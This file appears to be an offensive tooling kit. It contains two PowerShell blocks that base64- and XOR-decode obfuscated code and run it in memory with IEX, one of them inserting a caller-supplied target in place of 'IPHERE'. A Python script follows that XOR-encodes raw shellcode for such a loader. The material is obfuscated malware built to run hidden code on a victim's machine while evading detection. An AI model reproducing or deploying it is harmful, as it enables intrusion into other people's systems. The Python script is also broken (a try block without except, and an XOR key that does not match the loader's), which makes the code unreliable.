NLTE

$var_code = 'DUgUcntMT3QHaFpaTERLRVAHbkxdfVBZTFoBABJvRltMSEpBAQ1LCUBHCQ1IAAlSQE8JAQ1LB2dIREwJBEVAQkwJCwNAfF1ARVoLAAlSDUoUDUtUVBINTRQNSgduTF1vQExFTVoBDmdGR3lcS0VASgV6XUhdQEoOABJvRltMSEpBAQ1MCUBHCQ1NAAlSQE8JAQ1MB2dIREwJBEVAQkwJCwNAXW9IQEVMTQsACVINTxQNTFRUEg1OFA1PB3pMXX9IRVxMAQ1dW1xMBQ1dW1xMAA=='
$var_code = [System.Convert]::FromBase64String($var_code)
for ($i = 0; $i -lt $var_code.Length; $i++) {
    $var_code[$i] = $var_code[$i] -bxor 41
}
$var_code = [System.Text.Encoding]::UTF8.GetString($var_code)
IEX $var_code

function nlte {
$var_code = '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'
$var_code = [System.Convert]::FromBase64String($var_code)
for ($i = 0; $i -lt $var_code.Length; $i++) {
    $var_code[$i] = $var_code[$i] -bxor 41
}
$var_code = [System.Text.Encoding]::UTF8.GetString($var_code)
$var_code = $var_code.replace("IPHERE", $args[0])
IEX $var_code
}

#!/usr/bin/env python3

import sys
import base64

def xor_data(data, key):
    return bytes([b ^ key for b in data])

def main():
    input_file = sys.argv[1]

    try:
        with open(input_file, "rb") as f:
            shellcode = f.read()

    key = 35
    xored_data = xor_data(shellcode, key)
    base64_encoded = base64.b64encode(xored_data)

    sys.stdout.write(base64_encoded.decode())

if __name__ == "__main__":
    main()